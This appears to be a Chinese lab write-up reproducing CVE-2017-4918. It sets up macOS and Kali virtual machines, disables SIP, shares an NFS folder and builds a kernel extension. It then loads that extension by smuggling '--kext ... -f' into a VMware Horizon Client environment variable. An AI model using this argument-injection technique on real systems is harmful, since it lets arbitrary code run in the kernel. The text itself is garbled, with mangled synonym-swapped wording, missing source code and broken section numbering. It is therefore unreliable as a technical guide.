CVE-2017-4918 复现记录

麻辣鸡翅

CVE-2017-4918 复现

一、物理机环境搭建

体系捏造机镜像：OS X 10.11 El Capitan Retail  && kali-linux-2021.1-installer-amd64
软件：VMware 15.0.3 && unlocker (用于解锁VMware对MacOS的支持)
&& VMware-Horizon-Client-4.4.0-5164329 && XCode （用于生成驱动文件）
这里建议所有捏造机全部安装英文版，避免不须要的输入法题目，中文题目。别的网络连接模式都默认选择 NAT,方便捏造机通信。
[解锁方法](mkUnlocker: 适用于vmware 15.5的解除mac限定locker (gitee.com))
留意：先解锁，才能安装MacOS捏造机。
MacOS捏造机安装教程
[kali安装教程](图文详解在VMware Workstation 14 捏造机上安装Kali Linux黑客专用体系-网络教程与技术 -亦是美网络 (yishimei.cn))
其他留意事项：
如图所示，在MacOS的安全和隐私中，先勾选Anywhere选项，这个在安装Vmtools之前会用到。

禁用 SIP System Integrity Protection，雷同于Windows上的禁用驱动署名
捏造机 按下 cmd+r 键盘的同时点击重新启动，进入进入规复模式(这里的cmd在windows上对应的就是Win键)
然后选择实用工具(Utils)，打开一个终端
# 禁用驱动署名csrutil disable# 重启reboot安装XCode X.X 根据你的捏造机版本确定，下面时官方汗青发布先容的链接。
Xcode Releases | xcodereleases.com
上面网页中的Requires就是体系版本要求。通常环境下AppStore里下载的都是最新版，且不符合体系要求，导致不能安装，需要留意的是安装软件必须要注册AppID苹果账号。
XCode后续用于写一个简朴的内核驱动。
2、Kali

搭建NFS文件服务器
# 安装服务apt-get install nfs-kernel-server# 创建共享文件夹mkdir /root/share# 编辑配置文件vim /etc/exports增加如下内容
/root/share *(rw,insecure)# 重启nfs服务systemctl restart nfs-kernel-server这里服务重启后，查看两台捏造机的ip地址，通过ping测试是否能互相ping通，然后右键访达（Finder)，选择 Connect to Server，填入nfs://Kali的ip地址//root/share，点击连接（Connect ) 就可以看见共享文件夹了。

创建完成后可以置入如下代码到xxx.cpp文件中

点开Info.plist配置文件，点击加号，输入库的名称，后面跟上版本号。
编译后即可得到kexp.kext
将改驱动拷贝到linux下的共享目录下，紧接着在MacOS中开一个终端，导出一个环境变量。VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS
VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS="--kext /Volumes/share/kexp.kext -f"export VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONSecho $VMWARE_VIEW_USBARBITRATOR_LOG_OPTIONS# 运行漏洞软件./Open\ VMware\ View\ Client\ Services# 查看驱动是否加载kextstat |grep kexp最后可以看得驱动被加载到内核

四、杂项

误删用户目录操纵
Linux误删用户家(home)目录的规复方法_rmkloveme-CSDN博客
可以先测试常规方式加载驱动，测试驱动是否存在题目。
sudo chown -R root:wheel /Users/# 检测驱动文件存在的题目kextutil -tn kexp# 加载驱动sudo kextload kexp.kext# 卸载驱动sudo kextunload kexp.kext通过Console查看体系输出日记